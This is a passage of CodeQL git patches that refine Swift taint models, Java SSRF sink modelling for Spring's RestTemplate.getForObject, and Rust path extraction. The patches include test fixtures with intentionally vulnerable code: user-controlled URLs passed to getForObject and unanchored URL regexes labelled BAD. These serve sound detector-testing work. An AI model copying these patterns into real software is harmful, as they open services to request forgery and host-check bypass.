"c", source("source5")] for v in a1 { - sink(arg: v) // $ MISSING: flow=source5 + sink(arg: v) // $ flow=source5 } for ix in 0 ..< a1.count { sink(arg: a1[ix]) // $ flow=source5 @@ -93,7 +93,7 @@ func testArrays2() { a2[1] = source("source6") for v in a2 { - sink(arg: v) // $ MISSING: flow=source6 + sink(arg: v) // $ flow=source6 } for ix in 0 ..< a2.count { sink(arg: a2[ix]) // $ flow=source6 diff --git a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected index eb8c54fad76..6296a5ec04e 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected +++ b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected @@ -46,6 +46,9 @@ | UnanchoredUrlRegex.swift:71:46:71:46 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:78:39:78:39 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:79:39:79:39 | https?://good.com:8080 | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | +| UnanchoredUrlRegex.swift:82:3:82:3 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | +| UnanchoredUrlRegex.swift:83:3:83:3 | https?:\\/\\/good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | +| UnanchoredUrlRegex.swift:84:3:84:3 | ^https?://good.com | This hostname pattern may match any domain name, as it is missing a '$' or '/' at the end. | | UnanchoredUrlRegex.swift:91:3:91:3 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:101:39:101:39 | https?:\\/\\/good.com\\/([0-9]+) | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:107:39:107:39 | example\\.com\|whatever | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | diff --git a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift index 11da2ea6b1f..b2e8810e7b7 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift +++ b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift @@ -79,9 +79,9 @@ func tests(url: String, secure: Bool) throws { _ = try NSRegularExpression(pattern: #"https?://good.com:8080"#).firstMatch(in: input, range: inputRange) // BAD (missing anchor) let trustedUrlRegexs = [ - "https?://good.com", // BAD (missing anchor), referenced below [NOT DETECTED] - #"https?:\/\/good.com"#, // BAD (missing anchor), referenced below [NOT DETECTED] - "^https?://good.com" // BAD (missing post-anchor), referenced below [NOT DETECTED] + "https?://good.com", // BAD (missing anchor), referenced below + #"https?:\/\/good.com"#, // BAD (missing anchor), referenced below + "^https?://good.com" // BAD (missing post-anchor), referenced below ] for trustedUrlRegex in trustedUrlRegexs { if let _ = try NSRegularExpression(pattern: trustedUrlRegex).firstMatch(in: input, range: inputRange) { } From 23ed48ea128c7b435d7880098ecbaea64c474c74 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 28 Nov 2024 10:18:13 +0000 Subject: [PATCH 0756/1267] Swift: Add a couple more makeIterator() implementations to be safe. --- swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Array.qll | 1 + .../lib/codeql/swift/frameworks/StandardLibrary/Dictionary.qll | 3 ++- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Array.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Array.qll index 48494a1ed3a..f1d0677aa72 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Array.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Array.qll @@ -36,6 +36,7 @@ private class ArraySummaries extends SummaryModelCsv { ";Array;true;withUnsafeMutableBytes(_:);;;Argument[-1].CollectionElement;Argument[0].Parameter[0].CollectionElement;taint", ";Array;true;withUnsafeMutableBytes(_:);;;Argument[0].Parameter[0].CollectionElement;Argument[-1].CollectionElement;taint", ";Array;true;withUnsafeMutableBytes(_:);;;Argument[0].ReturnValue;ReturnValue;value", + ";Array;true;makeIterator();;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";ContiguousArray;true;withUnsafeBufferPointer(_:);;;Argument[-1];Argument[0].Parameter[0].CollectionElement;taint", ";ContiguousArray;true;withUnsafeBufferPointer(_:);;;Argument[-1].CollectionElement;Argument[0].Parameter[0].CollectionElement;value", ";ContiguousArray;true;withUnsafeBufferPointer(_:);;;Argument[0].ReturnValue;ReturnValue;value", diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Dictionary.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Dictionary.qll index 6ad2ba09e99..ca40beb1900 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Dictionary.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Dictionary.qll @@ -21,7 +21,8 @@ private class DictionarySummaries extends SummaryModelCsv { [ ";Dictionary;true;updateValue(_:forKey:);;;Argument[0];Argument[-1].CollectionElement.TupleElement[1];value", ";Dictionary;true;updateValue(_:forKey:);;;Argument[1];Argument[-1].CollectionElement.TupleElement[0];value", - ";Dictionary;true;updateValue(_:forKey:);;;Argument[-1].CollectionElement.TupleElement[1];ReturnValue.OptionalSome;value" + ";Dictionary;true;updateValue(_:forKey:);;;Argument[-1].CollectionElement.TupleElement[1];ReturnValue.OptionalSome;value", + ";Dictionary;true;makeIterator();;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ] } } From 65fb895ed5a4b8702a641051bc864f9300e05659 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Thu, 28 Nov 2024 15:51:01 +0000 Subject: [PATCH 0757/1267] (Unrelated) Fix typo in class name --- java/ql/lib/semmle/code/java/security/RequestForgery.qll | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/java/ql/lib/semmle/code/java/security/RequestForgery.qll b/java/ql/lib/semmle/code/java/security/RequestForgery.qll index a4e824c1cfe..a59bacb1fe7 100644 --- a/java/ql/lib/semmle/code/java/security/RequestForgery.qll +++ b/java/ql/lib/semmle/code/java/security/RequestForgery.qll @@ -81,8 +81,10 @@ private class HostnameSanitizingPrefix extends InterestingPrefix { * A value that is the result of prepending a string that prevents any value from controlling the * host of a URL. */ -private class HostnameSantizer extends RequestForgerySanitizer { - HostnameSantizer() { this.asExpr() = any(HostnameSanitizingPrefix hsp).getAnAppendedExpression() } +private class HostnameSanitizer extends RequestForgerySanitizer { + HostnameSanitizer() { + this.asExpr() = any(HostnameSanitizingPrefix hsp).getAnAppendedExpression() + } } /** From b5fbf2e9441dfcd5b424eb1fb9f4f52c420d9c9b Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Thu, 28 Nov 2024 13:03:09 +0000 Subject: [PATCH 0758/1267] Add models for third arg of getForObject No attempt to stop FPs. --- java/ql/lib/ext/org.springframework.web.client.model.yml | 3 +++ .../ql/test/query-tests/security/CWE-918/SpringSSRF.java | 9 +++++++++ 2 files changed, 12 insertions(+) diff --git a/java/ql/lib/ext/org.springframework.web.client.model.yml b/java/ql/lib/ext/org.springframework.web.client.model.yml index 79a7f577c3d..90abe1df71d 100644 --- a/java/ql/lib/ext/org.springframework.web.client.model.yml +++ b/java/ql/lib/ext/org.springframework.web.client.model.yml @@ -16,6 +16,9 @@ extensions: - ["org.springframework.web.client", "RestTemplate", False, "execute", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "getForEntity", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[0]", "request-forgery", "manual"] + - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[2]", "request-forgery", "manual"] # This is a workaround for the fact that sink model can't currently have access paths + # - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[2].ArrayElement", "request-forgery", "manual"] + # - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[2].MapValue", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "headForHeaders", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "optionsForAllow", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "patchForObject", "", "", "Argument[0]", "request-forgery", "manual"] diff --git a/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java b/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java index 6af4829ba02..917d8b29ac0 100644 --- a/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java +++ b/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java @@ -13,6 +13,7 @@ import java.net.http.HttpClient; import java.net.http.HttpRequest; import java.net.Proxy.Type; import java.io.InputStream; +import java.util.Map; import org.apache.http.client.methods.HttpGet; import javax.servlet.ServletException; @@ -32,6 +33,14 @@ public class SpringSSRF extends HttpServlet { restTemplate.exchange(fooResourceUrl, HttpMethod.POST, request, String.class); // $ SSRF restTemplate.execute(fooResourceUrl, HttpMethod.POST, null, null, "test"); // $ SSRF restTemplate.getForObject(fooResourceUrl, String.class, "test"); // $ SSRF + restTemplate.getForObject("http://{foo}", String.class, fooResourceUrl); // $ SSRF + restTemplate.getForObject("http://{foo}/a/b", String.class, fooResourceUrl); // $ SSRF + restTemplate.getForObject("http://safe.com/{foo}", String.class, fooResourceUrl); // $ SPURIOUS: SSRF // not bad - the tainted value does not affect the host + restTemplate.getForObject("http://{foo}", String.class, "safe.com", fooResourceUrl); // $ SPURIOUS: SSRF // not bad - the tainted value is unused + restTemplate.getForObject("http://{foo}", String.class, Map.of("foo", fooResourceUrl)); // $ SSRF + restTemplate.getForObject("http://safe.com/{foo}", String.class, Map.of("foo", fooResourceUrl)); // $ SPURIOUS: SSRF // not bad - the tainted value does not affect the host + restTemplate.getForObject("http://{foo}", String.class, Map.of("foo", "safe.com", "unused", fooResourceUrl)); // $ SPURIOUS: SSRF // not bad - the key for the tainted value is unused + restTemplate.getForObject("http://{foo}", String.class, Map.of("foo", "safe.com", fooResourceUrl, "unused")); // not bad - the tainted value is in a map key restTemplate.patchForObject(fooResourceUrl, new String("object"), String.class, "hi"); // $ SSRF restTemplate.postForEntity(new URI(fooResourceUrl), new String("object"), String.class); // $ SSRF restTemplate.postForLocation(fooResourceUrl, new String("object")); // $ SSRF From e08eac03d8c7c0c561cecb715e7fe525d1013a66 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 28 Nov 2024 17:44:34 +0000 Subject: [PATCH 0759/1267] Swift: Fix for Int.description. --- swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll | 2 +- .../library-tests/dataflow/taint/libraries/TaintInline.expected | 1 - 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll index b773177f152..0642003923b 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll @@ -167,7 +167,7 @@ private class StringFieldsInheritTaint extends TaintInheritingContent, "precomposedStringWithCompatibilityMapping", "removingPercentEncoding" ] or - namedTypeDecl.getFullName() = "CustomStringConvertible" and + namedTypeDecl.getFullName() = ["CustomStringConvertible", "BinaryInteger"] and fieldDecl.getName() = "description" or namedTypeDecl.getFullName() = "CustomDebugStringConvertible" and diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected index 5fcb458d4fc..4ba731519c4 100644 --- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected @@ -1,5 +1,4 @@ testFailures | optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | | optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | -| string.swift:599:35:600:1 | // $ tainted=599\n | Missing result: tainted=599 | failures From 1fc112e7a7d68f53720e93f9c4c2f43a5629b98e Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 28 Nov 2024 18:14:04 +0000 Subject: [PATCH 0760/1267] Swift: Fix for OptionSet. --- .../swift/frameworks/StandardLibrary/RawRepresentable.qll | 5 ++++- .../dataflow/taint/libraries/TaintInline.expected | 2 -- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll index 8d56ffb4dfd..bc468d3c4f8 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll @@ -12,7 +12,10 @@ private import codeql.swift.dataflow.FlowSteps */ private class RawRepresentableSummaries extends SummaryModelCsv { override predicate row(string row) { - row = ";RawRepresentable;true;init(rawValue:);;;Argument[0];ReturnValue;taint" + row = [ + ";RawRepresentable;true;init(rawValue:);;;Argument[0];ReturnValue;taint", + ";OptionSet;true;init(rawValue:);;;Argument[0];ReturnValue;taint" + ] } } diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected index 4ba731519c4..8ec8033d086 100644 --- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected @@ -1,4 +1,2 @@ testFailures -| optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | -| optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | failures From ba3f9d61346689ba61e69ffd17090e49f2a20fd0 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Thu, 28 Nov 2024 13:44:55 +0000 Subject: [PATCH 0761/1267] Convert model to QL --- .../org.springframework.web.client.model.yml | 3 --- .../java/frameworks/spring/SpringWebClient.qll | 18 ++++++++++++++++++ 2 files changed, 18 insertions(+), 3 deletions(-) diff --git a/java/ql/lib/ext/org.springframework.web.client.model.yml b/java/ql/lib/ext/org.springframework.web.client.model.yml index 90abe1df71d..79a7f577c3d 100644 --- a/java/ql/lib/ext/org.springframework.web.client.model.yml +++ b/java/ql/lib/ext/org.springframework.web.client.model.yml @@ -16,9 +16,6 @@ extensions: - ["org.springframework.web.client", "RestTemplate", False, "execute", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "getForEntity", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[0]", "request-forgery", "manual"] - - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[2]", "request-forgery", "manual"] # This is a workaround for the fact that sink model can't currently have access paths - # - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[2].ArrayElement", "request-forgery", "manual"] - # - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[2].MapValue", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "headForHeaders", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "optionsForAllow", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "patchForObject", "", "", "Argument[0]", "request-forgery", "manual"] diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll index 3a8d4bb084a..d245f5ed244 100644 --- a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll @@ -27,3 +27,21 @@ class SpringWebClient extends Interface { this.hasQualifiedName("org.springframework.web.reactive.function.client", "WebClient") } } + +private import semmle.code.java.security.RequestForgery + +private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink { + SpringWebClientRestTemplateGetForObject() { + exists(Method m, MethodCall mc, int i | + m.getDeclaringType() instanceof SpringRestTemplate and + m.hasName("getForObject") and + mc.getMethod() = m + | + // Deal with two overloads, with third parameter type `Object...` and + // `Map`. We cannot deal with mapvalue content easily but + // there is a default implicit taint read at sinks that will catch it. + this.asExpr() = mc.getArgument(i) and + i >= 2 + ) + } +} From 617f4f140e9fb4b2c64c8c8b91257c4c138512fb Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Thu, 28 Nov 2024 15:51:37 +0000 Subject: [PATCH 0762/1267] Make HostnameSanitizingPrefix public --- java/ql/lib/semmle/code/java/security/RequestForgery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/java/ql/lib/semmle/code/java/security/RequestForgery.qll b/java/ql/lib/semmle/code/java/security/RequestForgery.qll index a59bacb1fe7..c670d92b5ea 100644 --- a/java/ql/lib/semmle/code/java/security/RequestForgery.qll +++ b/java/ql/lib/semmle/code/java/security/RequestForgery.qll @@ -63,7 +63,7 @@ abstract class RequestForgerySanitizer extends DataFlow::Node { } private class PrimitiveSanitizer extends RequestForgerySanitizer instanceof SimpleTypeSanitizer { } -private class HostnameSanitizingPrefix extends InterestingPrefix { +class HostnameSanitizingPrefix extends InterestingPrefix { int offset; HostnameSanitizingPrefix() { From 7648d397f8291e99e53f804b82d516ceb3cbb661 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Thu, 28 Nov 2024 16:50:26 +0000 Subject: [PATCH 0763/1267] Improve model to remove some false positives --- .../frameworks/spring/SpringWebClient.qll | 57 +++++++++++++++++-- .../security/CWE-918/SpringSSRF.java | 6 +- 2 files changed, 54 insertions(+), 9 deletions(-) diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll index d245f5ed244..79f0cb9c8bb 100644 --- a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll @@ -35,13 +35,58 @@ private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink exists(Method m, MethodCall mc, int i | m.getDeclaringType() instanceof SpringRestTemplate and m.hasName("getForObject") and - mc.getMethod() = m + mc.getMethod() = m and + // Note that mc.getArgument(0) is modeled separately. This model is for + // arguments beyond the first two. There are two relevant overloads, one + // with third parameter type `Object...` and one with third parameter + // type `Map`. For the latter we cannot deal with mapvalue + // content easily but there is a default implicit taint read at sinks + // that will catch it. + this.asExpr() = mc.getArgument(i + 2) and + i >= 0 | - // Deal with two overloads, with third parameter type `Object...` and - // `Map`. We cannot deal with mapvalue content easily but - // there is a default implicit taint read at sinks that will catch it. - this.asExpr() = mc.getArgument(i) and - i >= 2 + // If we can determine that part of mc.getArgument(0) is a hostname + // sanitizing prefix, then we count how many placeholders occur before it + // and only consider that many arguments beyond the first two as sinks. + // For the `Map` overload this has the effect of only + // considering the map values as sinks if there is at least one + // placeholder in the URL before the hostname sanitizing prefix. + exists(HostnameSanitizingPrefix hsp | + hsp = mc.getArgument(0) and + i <= + max(int occurrenceIndex, int occurrenceOffset | + exists( + hsp.getStringValue().regexpFind("\\{[^}]*\\}", occurrenceIndex, occurrenceOffset) + ) and + occurrenceOffset < hsp.getOffset() + | + occurrenceIndex + ) + ) + or + // If we cannot determine that part of mc.getArgument(0) is a hostname + // sanitizing prefix, but it is a compile time constant and we can get + // its string value, then we count how many placeholders occur in it + // and only consider that many arguments beyond the first two as sinks. + // For the `Map` overload this has the effect of only + // considering the map values as sinks if there is at least one + // placeholder in the URL. + not mc.getArgument(0) instanceof HostnameSanitizingPrefix and + i <= + max(int occurrenceIndex | + exists( + mc.getArgument(0) + .(CompileTimeConstantExpr) + .getStringValue() + .regexpFind("\\{[^}]*\\}", occurrenceIndex, _) + ) + | + occurrenceIndex + ) + or + // If we cannot determine the string value of mc.getArgument(0), then we + // conservatively consider all arguments as sinks. + not exists(mc.getArgument(0).(CompileTimeConstantExpr).getStringValue()) ) } } diff --git a/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java b/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java index 917d8b29ac0..895c68eda69 100644 --- a/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java +++ b/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java @@ -35,10 +35,10 @@ public class SpringSSRF extends HttpServlet { restTemplate.getForObject(fooResourceUrl, String.class, "test"); // $ SSRF restTemplate.getForObject("http://{foo}", String.class, fooResourceUrl); // $ SSRF restTemplate.getForObject("http://{foo}/a/b", String.class, fooResourceUrl); // $ SSRF - restTemplate.getForObject("http://safe.com/{foo}", String.class, fooResourceUrl); // $ SPURIOUS: SSRF // not bad - the tainted value does not affect the host - restTemplate.getForObject("http://{foo}", String.class, "safe.com", fooResourceUrl); // $ SPURIOUS: SSRF // not bad - the tainted value is unused + restTemplate.getForObject("http://safe.com/{foo}", String.class, fooResourceUrl); // not bad - the tainted value does not affect the host + restTemplate.getForObject("http://{foo}", String.class, "safe.com", fooResourceUrl); // not bad - the tainted value is unused restTemplate.getForObject("http://{foo}", String.class, Map.of("foo", fooResourceUrl)); // $ SSRF - restTemplate.getForObject("http://safe.com/{foo}", String.class, Map.of("foo", fooResourceUrl)); // $ SPURIOUS: SSRF // not bad - the tainted value does not affect the host + restTemplate.getForObject("http://safe.com/{foo}", String.class, Map.of("foo", fooResourceUrl)); // not bad - the tainted value does not affect the host restTemplate.getForObject("http://{foo}", String.class, Map.of("foo", "safe.com", "unused", fooResourceUrl)); // $ SPURIOUS: SSRF // not bad - the key for the tainted value is unused restTemplate.getForObject("http://{foo}", String.class, Map.of("foo", "safe.com", fooResourceUrl, "unused")); // not bad - the tainted value is in a map key restTemplate.patchForObject(fooResourceUrl, new String("object"), String.class, "hi"); // $ SSRF From 7f8a1ae941703e6e01717f5777eb6b072df852a7 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Thu, 28 Nov 2024 17:03:41 +0000 Subject: [PATCH 0764/1267] Add change note --- ...4-11-28-model-resttemplate-getforobject-third-parameter.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 java/ql/lib/change-notes/2024-11-28-model-resttemplate-getforobject-third-parameter.md diff --git a/java/ql/lib/change-notes/2024-11-28-model-resttemplate-getforobject-third-parameter.md b/java/ql/lib/change-notes/2024-11-28-model-resttemplate-getforobject-third-parameter.md new file mode 100644 index 00000000000..4f45d19e5e8 --- /dev/null +++ b/java/ql/lib/change-notes/2024-11-28-model-resttemplate-getforobject-third-parameter.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* Added a sink for "Server-side request forgery" (`java/ssrf`) for the third parameter to org.springframework.web.client.RestTemplate.getForObject, when we cannot statically determine that it does not affect the host in the URL. From 2c061b0d560dd8a0fd18e6cbabacf500428ab761 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 29 Nov 2024 09:46:08 +0000 Subject: [PATCH 0765/1267] Add QLDoc for HostnameSanitizingPrefix --- .../lib/semmle/code/java/security/RequestForgery.qll | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/java/ql/lib/semmle/code/java/security/RequestForgery.qll b/java/ql/lib/semmle/code/java/security/RequestForgery.qll index c670d92b5ea..1f3ce61406f 100644 --- a/java/ql/lib/semmle/code/java/security/RequestForgery.qll +++ b/java/ql/lib/semmle/code/java/security/RequestForgery.qll @@ -63,14 +63,17 @@ abstract class RequestForgerySanitizer extends DataFlow::Node { } private class PrimitiveSanitizer extends RequestForgerySanitizer instanceof SimpleTypeSanitizer { } +/** + * A string constant that contains a prefix which looks like when it is prepended to untrusted + * input, it will restrict the host or entity addressed. + * + * For example, anything containing `?` or `#`, or a slash that doesn't appear to be a protocol + * specifier (e.g. `http://` is not sanitizing), or specifically the string "/". + */ class HostnameSanitizingPrefix extends InterestingPrefix { int offset; HostnameSanitizingPrefix() { - // Matches strings that look like when prepended to untrusted input, they will restrict - // the host or entity addressed: for example, anything containing `?` or `#`, or a slash that - // doesn't appear to be a protocol specifier (e.g. `http://` is not sanitizing), or specifically - // the string "/". exists(this.getStringValue().regexpFind("([?#]|[^?#:/\\\\][/\\\\])|^/$", 0, offset)) } From 9cf2420c3b4d63601d8c5c74fa99ecd353895b9f Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 29 Nov 2024 14:42:25 +0100 Subject: [PATCH 0766/1267] Rust: restrict canonical path calculations --- rust/extractor/src/generated/.generated.list | 2 +- rust/extractor/src/generated/top.rs | 171 +++++++++++------- rust/extractor/src/translate/base.rs | 35 ++-- rust/extractor/src/translate/mappings.rs | 34 ++++ rust/ql/.generated.list | 63 ++++--- rust/ql/.gitattributes | 15 +- rust/ql/lib/codeql/rust/elements/Path.qll | 2 +- .../lib/codeql/rust/elements/PathExprBase.qll | 1 + rust/ql/lib/codeql/rust/elements/PathPat.qll | 1 + .../lib/codeql/rust/elements/RecordExpr.qll | 1 + .../ql/lib/codeql/rust/elements/RecordPat.qll | 1 + .../lib/codeql/rust/elements/Resolvable.qll | 2 +- .../codeql/rust/elements/TupleStructPat.qll | 1 + .../elements/internal/CallExprBaseImpl.qll | 3 +- .../rust/elements/internal/ResolvableImpl.qll | 2 +- .../elements/internal/TupleStructPatImpl.qll | 6 +- .../internal/generated/ParentChild.qll | 83 +++++---- .../rust/elements/internal/generated/Path.qll | 4 +- .../internal/generated/PathExprBase.qll | 3 +- .../elements/internal/generated/PathPat.qll | 3 +- .../rust/elements/internal/generated/Raw.qll | 56 +++--- .../internal/generated/RecordExpr.qll | 3 +- .../elements/internal/generated/RecordPat.qll | 3 +- .../internal/generated/Resolvable.qll | 2 +- .../elements/internal/generated/Synth.qll | 29 ++- .../internal/generated/TupleStructPat.qll | 3 +- rust/ql/lib/rust.dbscheme | 39 ++-- .../canonical_path/canonical_paths.expected | 41 +---- .../extractor-tests/canonical_path/regular.rs | 8 + .../FormatTemplateVariableAccess.expected | 10 +- .../FormatTemplateVariableAccess.ql | 12 +- ...ableAccess_getResolvedCrateOrigin.expected | 0 ...teVariableAccess_getResolvedCrateOrigin.ql | 7 + ...ateVariableAccess_getResolvedPath.expected | 0 ...tTemplateVariableAccess_getResolvedPath.ql | 7 + .../generated/Path/Path.expected | 52 +++--- .../extractor-tests/generated/Path/Path.ql | 12 +- .../generated/Path/PathExpr.expected | 12 +- .../generated/Path/PathExpr.ql | 13 +- .../PathExpr_getResolvedCrateOrigin.expected | 0 .../Path/PathExpr_getResolvedCrateOrigin.ql | 7 + .../Path/PathExpr_getResolvedPath.expected | 0 .../Path/PathExpr_getResolvedPath.ql | 7 + .../generated/Path/PathPat.expected | 2 +- .../extractor-tests/generated/Path/PathPat.ql | 11 +- .../PathPat_getResolvedCrateOrigin.expected | 0 ...n.ql => PathPat_getResolvedCrateOrigin.ql} | 2 +- .../Path/PathPat_getResolvedPath.expected | 0 ...lvedPath.ql => PathPat_getResolvedPath.ql} | 2 +- .../Path/Path_getResolvedCrateOrigin.expected | 2 - .../Path/Path_getResolvedPath.expected | 2 - .../generated/RecordExpr/RecordExpr.expected | 8 +- .../generated/RecordExpr/RecordExpr.ql | 13 +- ...RecordExpr_getResolvedCrateOrigin.expected | 0 .../RecordExpr_getResolvedCrateOrigin.ql | 7 + .../RecordExpr_getResolvedPath.expected | 0 .../RecordExpr/RecordExpr_getResolvedPath.ql | 7 + .../generated/RecordPat/RecordPat.expected | 4 +- .../generated/RecordPat/RecordPat.ql | 13 +- .../RecordPat_getResolvedCrateOrigin.expected | 0 .../RecordPat_getResolvedCrateOrigin.ql | 7 + .../RecordPat_getResolvedPath.expected | 0 .../RecordPat/RecordPat_getResolvedPath.ql | 7 + .../TupleStructPat/TupleStructPat.expected | 6 +- .../TupleStructPat/TupleStructPat.ql | 13 +- .../TupleStructPat_getField.expected | 14 +- .../TupleStructPat_getPath.expected | 6 +- ...eStructPat_getResolvedCrateOrigin.expected | 0 .../TupleStructPat_getResolvedCrateOrigin.ql | 7 + .../TupleStructPat_getResolvedPath.expected | 0 .../TupleStructPat_getResolvedPath.ql | 7 + rust/schema/annotations.py | 12 +- rust/schema/prelude.py | 2 +- 73 files changed, 583 insertions(+), 327 deletions(-) create mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.expected create mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql create mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.expected create mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql create mode 100644 